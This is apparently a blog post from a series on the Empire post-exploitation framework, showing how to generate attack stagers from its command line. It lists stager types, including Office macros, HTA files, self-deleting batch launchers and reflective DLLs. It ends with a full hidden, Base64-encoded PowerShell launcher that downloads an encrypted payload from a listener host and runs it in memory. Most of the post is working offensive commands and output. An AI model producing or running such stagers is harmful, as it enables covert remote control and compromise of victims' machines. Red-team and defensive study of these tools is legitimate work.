This post is part of the ‘Empire Series’ with some background and an ongoing list of series posts [kept here].
Recently, an Empire user requested that we build a ‘standalone payload generator’, similar to msfvenom’s functionality. The motivation is to provide a scriptable capability that makes integration with other tools relatively easy. This short post will cover the newly integrated command line options for Empire which allow for the scripted generation of stagers.
To display the currently available options, run ./empire -h
# ./empire -h
usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
[-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]
optional arguments:
-h, --help show this help message and exit
--debug [DEBUG] Debug level for output (default of 1).
-s [STAGER], --stager [STAGER]
Specify a stager to generate. Lists all stagers if
none is specified.
-o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
Supply options to set for a stager in OPTION=VALUE
format. Lists options if nothing is specified.
-l [LISTENER], --listener [LISTENER]
Display listener options. Displays all listeners if
nothing is specified.
-v, --version Display current Empire version.
In order to effectively use Empire’s CLI, you need to have a listener currently set up so the data is stored in the backend empire.db database. In order to generate the stagers, an ./empire instance doesn’t have to be running at the same time (though it can be), but it does need to be executed from the same path as the Empire installation containing the configured listeners.
In order to display the active listeners, use ./empire -l
# ./empire -l
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 test http://192.168.52.142:8080 native 5/0.0
To display the configuration for a particular listener, use ./empire -l <listener_name>
# ./empire -l test
Listener Options:
Name Required Value Description
---- -------- ------- -----------
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True test Listener name.
DefaultLostLimit True 60 Number of missed checkins before exiting
StagingKey True 2c103f2c4ed1e59c0b4e2e01821770fa Staging key for initial agent negotiation.
Type True native Listener type (native, pivot, hop).
ID True 1 Listener ID.
RedirectTarget False Listener target to redirect to for pivot/hop.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
WorkingHours False Hours for the agent to operate (09:00-17:00).
Host True http://192.168.52.139:8080 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
DefaultProfile True /admin/get.php,/news.asp,/login/ Default communication profile for the agent.
process.jsp|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Port True 8080 Port for the listener.
If you want to display the available Empire stagers, use ./empire -s
# ./empire -s Stagers: Name Description ---- ----------- ducky Generates a ducky script that runes a one-liner stage0 launcher for Empire. hta Generates an HTA (HyperText Application) For Internet Explorer launcher Generates a one-liner stage0 launcher for Empire. macro Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types. launcher_bat Generates a self-deleting .bat launcher for Empire. dll Generate a PowerPick Reflective DLL to inject with stager code. launcher_vbs Generates a .vbs launcher for Empire. stager Generates a (stage1) key-negotiation stager for Empire. pth_wmis Generates a pth-wmis launcher for Empire. war Generates a Deployable War file. hop_php Generates a hop.php redirector for an Empire listener.
To see the configurable options for a given stager, use ./empire -s <stager_name>
# ./empire -s launcher
Name: Launcher
Description:
Generates a one-liner stage0 launcher for Empire.
Options:
Name Required Value Description
---- -------- ------- -----------
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Base64 True True Switch. Base64 encode the output.
Listener True Listener to generate stager for.
OutFile False File to output launcher to, otherwise
displayed on the screen.
Proxy False default Proxy to use for request (default, none,
or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
And finally, to generate a given stager, use the -o OPTION1=VALUE1 OPTION2=VALUE2 format. Be sure to note which options are required from the above configuration display.
# ./empire -s launcher -o Listener=test powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAPQBOAEUAdwAtAE8AYgBKAGUAQwB0ACAAUwBZAHMAVABFAE0ALgBOAGUAVAAuAFcARQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBjAC4ASABlAEEARABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAE8AWABZACAAPQAgAFsAUwB5AFMAVABFAE0ALgBOAEUAVAAuAFcAZQBiAFIARQBxAHUARQBzAHQAXQA6ADoARABlAGYAYQB1AGwAVABXAGUAQgBQAHIATwB4AFkAOwAkAFcAQwAuAFAAUgBPAFgAWQAuAEMAUgBFAGQARQBOAHQASQBhAGwAcwAgAD0AIABbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBDAFIARQBkAGUAbgBUAGkAQQBsAEMAYQBDAGgAZQBdADoAOgBEAEUAZgBBAFUAbAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABFAG4AdABpAEEATABTADsAJABLAD0AJwAyAGMAMQAwADMAZgAyAGMANABlAGQAMQBlADUAOQBjADAAYgA0AGUAMgBlADAAMQA4ADIAMQA3ADcAMABmAGEAJwA7ACQASQA9ADAAOwBbAGMASABBAHIAWwBdAF0AJABCAD0AKABbAEMASABBAHIAWwBdAF0AKAAkAFcAQwAuAEQAbwB3AG4ATABvAEEARABTAHQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQAyAC4AMQAzADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwByACQAawBbACQASQArACsAJQAkAEsALgBMAGUATgBHAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbgAnACcAKQA=
Have fun!